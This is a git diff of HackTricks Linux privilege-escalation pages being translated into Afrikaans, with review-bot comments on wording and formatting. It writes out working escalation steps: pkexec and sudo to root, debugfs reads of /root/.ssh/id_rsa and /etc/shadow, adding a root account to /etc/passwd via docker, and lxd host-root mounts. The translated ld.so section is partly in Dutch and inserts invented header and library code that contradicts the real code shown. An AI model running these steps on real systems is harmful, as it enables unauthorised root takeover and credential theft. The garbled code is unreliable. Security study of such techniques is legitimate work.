geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Sudo/Admin Groups +## Sudo/Admin Groepe -### **PE - Method 1** - -**Sometimes**, **by default (or because some software needs it)** inside the **/etc/sudoers** file you can find some of these lines: +### **PE - Metode 1** +**Soms**, **standaard (of omdat sommige sagteware dit nodig het)** binne die **/etc/sudoers**-lêer kan jy sommige van hierdie lyne vind: ```bash # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL 
@@ -27,95 +26,75 @@ Other ways to support HackTricks: # Allow members of group admin to execute any command %admin ALL=(ALL:ALL) ALL ``` +Dit beteken dat **enige gebruiker wat behoort tot die groep sudo of admin enigiets as sudo kan uitvoer**. -This means that **any user that belongs to the group sudo or admin can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +Indien dit die geval is, kan jy **root word deur net die volgende uit te voer**: ``` sudo su ``` +### PE - Metode 2 -### PE - Method 2 - -Find all suid binaries and check if there is the binary **Pkexec**: - +Vind alle suid-binêre en kyk of die binêre **Pkexec** daar is: ```bash find / -perm -4000 2>/dev/null ``` - -If you find that the binary **pkexec is a SUID binary** and you belong to **sudo** or **admin**, you could probably execute binaries as sudo using `pkexec`.\ -This is because typically those are the groups inside the **polkit policy**. This policy basically identifies which groups can use `pkexec`. Check it with: - +As jy vind dat die binêre **pkexec 'n SUID-binêre** is en jy behoort aan **sudo** of **admin**, kan jy waarskynlik binêre lêers as sudo uitvoer met behulp van `pkexec`.\ +Dit is omdat dit tipies die groepe is binne die **polkit-beleid**. Hierdie beleid identifiseer basies watter groepe `pkexec` kan gebruik. Kontroleer dit met: ```bash cat /etc/polkit-1/localauthority.conf.d/* ``` +Daar sal jy vind watter groepe toegelaat word om **pkexec** uit te voer en **standaard** verskyn die groepe **sudo** en **admin** in sommige Linux-distros. -There you will find which groups are allowed to execute **pkexec** and **by default** in some linux disctros the groups **sudo** and **admin** appear. 
- -To **become root you can execute**: - +Om **root te word kan jy uitvoer**: ```bash pkexec "/bin/sh" #You will be prompted for your user password ``` - -If you try to execute **pkexec** and you get this **error**: - +As jy probeer om **pkexec** uit te voer en jy kry hierdie **fout**: ```bash polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie ==== AUTHENTICATION FAILED === Error executing command as another user: Not authorized ``` +**Dit is nie omdat jy nie toestemmings het nie, maar omdat jy nie sonder 'n GUI gekoppel is nie**. En daar is 'n oplossing vir hierdie probleem hier: [https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). Jy benodig **2 verskillende ssh-sessies**: -**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**: - -{% code title="session1" %} +{% code title="sessie1" %} ```bash echo $$ #Step1: Get current PID pkexec "/bin/bash" #Step 3, execute pkexec #Step 5, if correctly authenticate, you will have a root session ``` -{% endcode %} - -{% code title="session2" %} +{% code title="sessie2" %} ```bash pkttyagent --process #Step 2, attach pkttyagent to session1 #Step 4, you will be asked in this session to authenticate to pkexec ``` {% endcode %} -## Wheel Group - -**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line: +## Wielgroep +Soms, standaard binne die /etc/sudoers-lêer, kan jy hierdie lyn vind: ``` %wheel ALL=(ALL:ALL) ALL ``` +Dit beteken dat **enige gebruiker wat behoort tot die groep wheel enigiets as sudo kan uitvoer**. 
-This means that **any user that belongs to the group wheel can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +As dit die geval is, kan jy **root word deur net uit te voer**: ``` sudo su ``` +## Skadugroep -## Shadow Group - -Users from the **group shadow** can **read** the **/etc/shadow** file: - +Gebruikers van die **skadugroep** kan die **/etc/shadow**-lêer **lees**: ``` -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow ``` +So, lees die lêer en probeer om **sommige hashe te kraak**. -So, read the file and try to **crack some hashes**. +## Disk Groep -## Disk Group - -This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. - -Files:`/dev/sd[a-z][1-9]` +Hierdie voorreg is amper **gelykwaardig aan root-toegang** aangesien jy toegang het tot alle data binne-in die masjien. +Lêers: `/dev/sd[a-z][1-9]` ```bash df -h #Find where "/" is mounted debugfs /dev/sda1 
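Review bot: the Wheel Group paragraph lost all of its emphasis: `**Sometimes**, **by default** inside the **/etc/sudoers** file` became `+Soms, standaard binne die /etc/sudoers-lêer, kan jy hierdie lyn vind:`, while the equivalent sentence in the Sudo/Admin section just above keeps its bold and the `**/etc/sudoers**` path marking. Suggest "**Soms**, **standaard** binne die **/etc/sudoers**-lêer kan jy hierdie lyn vind:" for consistency. Heading style is also mixed within this hunk: `## Wielgroep` and `## Skadugroep` are compounded, but `## Disk Groep` (and `Video Groep`, `Root Groep`, `Docker Groep` in the next hunks) are two words; pick one form. Finally, the code tab titles were translated to `sessie1` / `sessie2` but the comments inside still say `attach pkttyagent to session1`, so the tab name and the step comment no longer match.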
@@ -124,57 +103,47 @@ debugfs: ls debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow ``` - -Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do: - +Let daarop dat jy met behulp van debugfs ook **lêers kan skryf**. Byvoorbeeld, om `/tmp/asd1.txt` na `/tmp/asd2.txt` te kopieer, kan jy die volgende doen: ```bash debugfs -w /dev/sda1 debugfs: dump /tmp/asd1.txt /tmp/asd2.txt ``` +Echter, as jy probeer om lêers wat deur root besit word te skryf (soos `/etc/shadow` of `/etc/passwd`), sal jy 'n "**Permission denied**" fout kry. -However, if you try to **write files owned by root** (like `/etc/shadow` or `/etc/passwd`) you will have a "**Permission denied**" error. - -## Video Group - -Using the command `w` you can find **who is logged on the system** and it will show an output like the following one: +## Video Groep +Met die opdrag `w` kan jy **sien wie op die stelsel aangemeld is** en dit sal 'n uitset soos die volgende een toon: ```bash USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yossi tty1 22:16 5:13m 0.05s 0.04s -bash moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash ``` +Die **tty1** beteken dat die gebruiker **yossi fisies ingeteken** is op 'n terminaal op die masjien. -The **tty1** means that the user **yossi is logged physically** to a terminal on the machine. - -The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size` - +Die **video groep** het toegang om die skermuitset te sien. Jy kan basies die skerms waarneem. Om dit te doen, moet jy die huidige beeld op die skerm in rou data vasvang en die resolusie kry wat die skerm gebruik. 
Die skerminligting kan gestoor word in `/dev/fb0` en jy kan die resolusie van hierdie skerm vind op `/sys/class/graphics/fb0/virtual_size`. ```bash cat /dev/fb0 > /tmp/screen.raw cat /sys/class/graphics/fb0/virtual_size ``` - -To **open** the **raw image** you can use **GIMP**, select the \*\*`screen.raw` \*\* file and select as file type **Raw image data**: +Om die **rou beeld** oop te maak, kan jy **GIMP** gebruik, kies die \*\*`screen.raw` \*\* lêer en kies as lêertipe **Rou beelddata**: ![](<../../../.gitbook/assets/image (287) (1).png>) -Then modify the Width and Height to the ones used on the screen and check different Image Types (and select the one that shows better the screen): +Wysig dan die Breedte en Hoogte na die waardes wat op die skerm gebruik word en kyk na verskillende Beeldtipes (en kies die een wat die skerm beter wys): ![](<../../../.gitbook/assets/image (288).png>) -## Root Group +## Root Groep -It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges... - -**Check which files root members can modify**: +Dit lyk asof **lede van die root groep** standaard toegang kan hê om sekere **dienskonfigurasie-lêers** of sekere **biblioteeklêers** of **ander interessante dinge** te wysig wat gebruik kan word om voorregte te verhoog... +**Kyk watter lêers root-lede kan wysig**: ```bash find / -group root -perm -g=w 2>/dev/null ``` +## Docker Groep -## Docker Group - -You can **mount the root filesystem of the host machine to an instance’s volume**, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. - +Jy kan die **wortel lêerstelsel van die gasheer rekenaar aan 'n instansie se volume koppel**, sodat wanneer die instansie begin, dit onmiddellik 'n `chroot` in daardie volume laai. 
Dit gee jou effektief beheer oor die rekenaar. ```bash docker image #Get images from the docker service 
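Review bot: In the interesting-groups README hunk `@@ -124,57 +103,47 @@`, the translated paragraph `+Echter, as jy probeer om lêers wat deur root besit word te skryf` uses the Dutch word `Echter`; the Afrikaans form is `Egter`, and the rest of the paragraph is Afrikaans. The same hunk also removes the blank lines that separated prose from the following ```bash fences (the deleted `-` blank lines before `debugfs -w /dev/sda1`, `USER TTY FROM`, `cat /dev/fb0 > /tmp/screen.raw` and `find / -group root`), which is unrelated to the translation and adds diff noise; suggest restoring those blank lines so the hunk only touches the text being translated, and carrying the pre-existing `\*\*`screen.raw` \*\*` escaping fix into a separate change if it is meant to be cleaned up.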
@@ -186,45 +155,44 @@ echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /etc/pa #Ifyou just want filesystem and network access you can startthe following container: docker run --rm -it --pid=host --net=host --privileged -v /:/mnt chroot /mnt bashbash ``` - -Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to **run a privileged container and escape from it** as explained here: +Uiteindelik, as jy nie van enige van die voorstelle voor hou nie, of as hulle nie werk om een ​​of ander rede (docker api firewall?) nie, kan jy altyd probeer om **'n bevoorregte houer te hardloop en daaruit te ontsnap** soos hier verduidelik: {% content-ref url="../docker-security/" %} [docker-security](../docker-security/) {% endcontent-ref %} -If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../#writable-docker-socket)**.** +As jy skryfregte oor die docker-socket het, lees dan [**hierdie berig oor hoe om voorregte te verhoog deur die docker-socket te misbruik**](../#writable-docker-socket)**.** {% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} {% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} -## lxc/lxd Group +## lxc/lxd Groep {% content-ref url="./" %} [.](./) {% endcontent-ref %} -## Adm Group +## Adm Groep -Usually **members** of the group **`adm`** have permissions to **read log** files located inside _/var/log/_.\ -Therefore, if you have compromised a user inside this group you should definitely take a **look to the logs**. +Gewoonlik het **lede** van die groep **`adm`** toestemmings om **loglêers** wat binne _/var/log/_ geleë is, te **lees**.\ +Daarom, as jy 'n gebruiker in hierdie groep gekompromitteer het, moet jy beslis na die loglêers **kyk**. 
-## Auth group +## Auth Groep -Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey**_ and _**/var/db/yubikey**_ if they are used.\ -These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) +Binne OpenBSD kan die **auth** groep gewoonlik skryfregte hê in die lêers _**/etc/skey**_ en _**/var/db/yubikey**_ as dit gebruik word.\ +Hierdie toestemmings kan misbruik word met die volgende uitbuiting om **voorregte te verhoog** na root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
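Review bot: In hunk `@@ -186,45 +155,44 @@` the translated sentence `+Uiteindelik, as jy nie van enige van die voorstelle voor hou nie, of as hulle nie werk om een ​​of ander rede` carries invisible zero-width characters between `een` and `of` (the whitespace there is wider than a single space); they should be stripped before merge so that search and copy-paste behave. In the Auth group paragraph of the same hunk, `+Binne OpenBSD kan die **auth** groep gewoonlik skryfregte hê in die lêers _**/etc/skey**_ en _**/var/db/yubikey**_` renders the original "folders" as `lêers` (files); `/etc/skey` and `/var/db/yubikey` are directories, so use `gidse` (or `vouers`) to keep the meaning.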
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md index 3e93f306b..25b40652a 100644 --- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md +++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md @@ -1,27 +1,26 @@ -# lxd/lxc Group - Privilege escalation +# lxd/lxc Groep - Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root +As jy behoort tot die _**lxd**_ **of** _**lxc**_ **groep**, kan jy root word -## Exploiting without internet +## Uitbuiting sonder internet -### Method 1 - -You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(follow the instructions of the github): +### Metode 1 +Jy kan hierdie distro-bouer installeer op jou rekenaar: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)(volg die instruksies op die github): ```bash sudo su #Install requirements @@ -39,9 +38,7 @@ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml #Create the container sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18 ``` - -Upload the files **lxd.tar.xz** and **rootfs.squashfs**, add the image to the repo and create a container: - +Laai die lêers **lxd.tar.xz** en **rootfs.squashfs** op, voeg die prent by die repo en skep 'n houer: ```bash lxc image import lxd.tar.xz rootfs.squashfs --alias alpine 
@@ -56,24 +53,20 @@ lxc list lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true ``` - {% hint style="danger" %} -If you find this error _**Error: No storage pool found. Please create a new storage pool**_\ -Run **`lxd init`** and **repeat** the previous chunk of commands +As jy hierdie fout vind _**Fout: Geen stoorpoel gevind nie. Skep asseblief 'n nuwe stoorpoel**_\ +Voer **`lxd init`** uit en **herhaal** die vorige stuk bevele {% endhint %} -Finally you can execute the container and get root: - +Uiteindelik kan jy die houer uitvoer en root kry: ```bash lxc start privesc lxc exec privesc /bin/sh [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` +### Metode 2 -### Method 2 - -Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. - +Bou 'n Alpine-beeld en begin dit met die vlag `security.privileged=true`, wat die houer dwing om as root met die gasheer se lêersisteem te kommunikeer. ```bash # build a simple alpine image git clone https://github.com/saghul/lxd-alpine-builder @@ -84,7 +77,7 @@ sudo ./build-alpine -a i686 # import the image lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail. -# before running the image, start and configure the lxd storage pool as default +# before running the image, start and configure the lxd storage pool as default lxd init # run the image 
@@ -97,36 +90,33 @@ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursiv lxc start mycontainer lxc exec mycontainer /bin/sh ``` +Alternatiewelik [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root) -Alternatively [https://github.com/initstring/lxd\_root](https://github.com/initstring/lxd\_root) - -## With internet - -You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html). +## Met internet +Jy kan [hierdie instruksies](https://reboare.github.io/lxd/lxd-escape.html) volg. ```bash lxc init ubuntu:16.04 test -c security.privileged=true -lxc config device add test whatever disk source=/ path=/mnt/root recursive=true +lxc config device add test whatever disk source=/ path=/mnt/root recursive=true lxc start test lxc exec test bash [email protected]:~# cd /mnt/root #Here is where the filesystem is mounted ``` - -## References +## Verwysings * [https://reboare.github.io/lxd/lxd-escape.html](https://reboare.github.io/lxd/lxd-escape.html) * [https://etcpwd13.github.io/greyfriar_blog/blog/writeup/Notes-Included/](https://etcpwd13.github.io/greyfriar_blog/blog/writeup/Notes-Included/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
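Review bot: In the lxd-privilege-escalation hunk `@@ -56,24 +53,20 @@`, the danger hint translates a literal program message: `+As jy hierdie fout vind _**Fout: Geen stoorpoel gevind nie. Skep asseblief 'n nuwe stoorpoel**_`. The reader has to match this against what `lxc` actually prints, which is `Error: No storage pool found. Please create a new storage pool`, so quoted tool output should stay verbatim in English and only the surrounding sentence should be translated. The hunks `@@ -1,27 +1,26 @@` and `@@ -39,9 +38,7 @@` also drop the blank lines around fences (for example the `-` blank lines before `sudo su` and `lxc image import`), which is unrelated to the translation; and the footer in this file says `github-repos` while the README footer in the same PR says `github-opslag`, so pick one term for the whole translation.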
diff --git a/linux-hardening/privilege-escalation/ld.so.conf-example.md b/linux-hardening/privilege-escalation/ld.so.conf-example.md index c9e7f58c0..44a4f0363 100644 --- a/linux-hardening/privilege-escalation/ld.so.conf-example.md +++ b/linux-hardening/privilege-escalation/ld.so.conf-example.md @@ -1,22 +1,22 @@ -# ld.so privesc exploit example +# ld.so privesc uitbuiting voorbeeld
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Prepare the environment +## Bereid de omgeving voor -In the following section you can find the code of the files we are going to use to prepare the environment +In de volgende sectie vind je de code van de bestanden die we gaan gebruiken om de omgeving voor te bereiden {% tabs %} {% tab title="sharedvuln.c" %} 
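Review bot: The ld.so.conf-example hunk `@@ -1,22 +1,22 @@` is translated into Dutch rather than Afrikaans, which contradicts the PR title: `+Andere manieren om HackTricks te ondersteunen:`, `+* Als je je **bedrijf wilt adverteren in HackTricks**`, `+## Bereid de omgeving voor` and `+In de volgende sectie vind je de code` are all Dutch. It also translates the link text `SUBSCRIPTION PLANS` to `ABONNEMENTSPAKKETTEN`, whereas every other file in this PR keeps that link text unchanged. Suggest re-translating this hunk into Afrikaans consistent with the other files (the footer block used in the lxd file is a ready template) and leaving the link text as-is.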
@@ -25,65 +25,90 @@ In the following section you can find the code of the files we are going to use #include "libcustom.h" int main(){ - printf("Welcome to my amazing application!\n"); - vuln_func(); - return 0; +printf("Welcome to my amazing application!\n"); +vuln_func(); +return 0; } ``` -{% endtab %} - {% tab title="libcustom.h" %} + +Hierdie lêer definieer die funksies en strukture vir die `libcustom` biblioteek. + +```c +#ifndef LIBCUSTOM_H +#define LIBCUSTOM_H + +#include + +// Funksie om 'n boodskap na die skerm te druk +void print_message(const char* message); + +// Funksie om twee getalle op te tel +int add_numbers(int a, int b); + +#endif /* LIBCUSTOM_H */ +``` + +{% endtab %} ```c #include void vuln_func(); ``` -{% endtab %} - {% tab title="libcustom.c" %} + +Hier is 'n voorbeeld van 'n eenvoudige C-program wat 'n aangepaste biblioteek, libcustom.so, gebruik: + +```c +#include + +void custom_function() { + printf("Hierdie is 'n aangepaste funksie in die libcustom.so biblioteek.\n"); +} +``` + +Hierdie program bevat 'n enkele funksie, `custom_function()`, wat 'n eenvoudige boodskap na die uitvoer skryf. Hierdie funksie sal gebruik word in die volgende voorbeeld om die priviligie-escalasie te demonstreer. + +{% endtab %} ```c #include void vuln_func() { - puts("Hi"); +puts("Hi"); } ``` +{% tabs %} +{% tab title="Afrikaans" %} +1. **Skep** daardie lêers op jou rekenaar in dieselfde vouer +2. **Kompileer** die **biblioteek**: `gcc -shared -o libcustom.so -fPIC libcustom.c` +3. **Kopieer** `libcustom.so` na `/usr/lib`: `sudo cp libcustom.so /usr/lib` (root privs) +4. **Kompileer** die **uitvoerbare lêer**: `gcc sharedvuln.c -o sharedvuln -lcustom` + +### Kontroleer die omgewing + +Kontroleer dat _libcustom.so_ vanaf _/usr/lib_ **gelaai** word en dat jy die binêre lêer kan **uitvoer**. {% endtab %} {% endtabs %} - -1. **Create** those files in your machine in the same folder -2. **Compile** the **library**: `gcc -shared -o libcustom.so -fPIC libcustom.c` -3. 
**Copy** `libcustom.so` to `/usr/lib`: `sudo cp libcustom.so /usr/lib` (root privs) -4. **Compile** the **executable**: `gcc sharedvuln.c -o sharedvuln -lcustom` - -### Check the environment - -Check that _libcustom.so_ is being **loaded** from _/usr/lib_ and that you can **execute** the binary. - ``` $ ldd sharedvuln - linux-vdso.so.1 => (0x00007ffc9a1f7000) - libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000) - /lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000) - -$ ./sharedvuln +linux-vdso.so.1 => (0x00007ffc9a1f7000) +libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000) +/lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000) + +$ ./sharedvuln Welcome to my amazing application! Hi ``` +## Uitbuiting -## Exploit - -In this scenario we are going to suppose that **someone has created a vulnerable entry** inside a file in _/etc/ld.so.conf/_: - +In hierdie scenario gaan ons aanneem dat **iemand 'n kwesbare inskrywing geskep het** binne 'n lêer in _/etc/ld.so.conf/_: ```bash sudo echo "/home/ubuntu/lib" > /etc/ld.so.conf.d/privesc.conf ``` - -The vulnerable folder is _/home/ubuntu/lib_ (where we have writable access).\ -**Download and compile** the following code inside that path: - +Die kwesbare gids is _/home/ubuntu/lib_ (waar ons skryftoegang het).\ +**Laai die volgende kode af en stel dit saam** binne daardie pad: ```c //gcc -shared -o libcustom.so -fPIC libcustom.c 
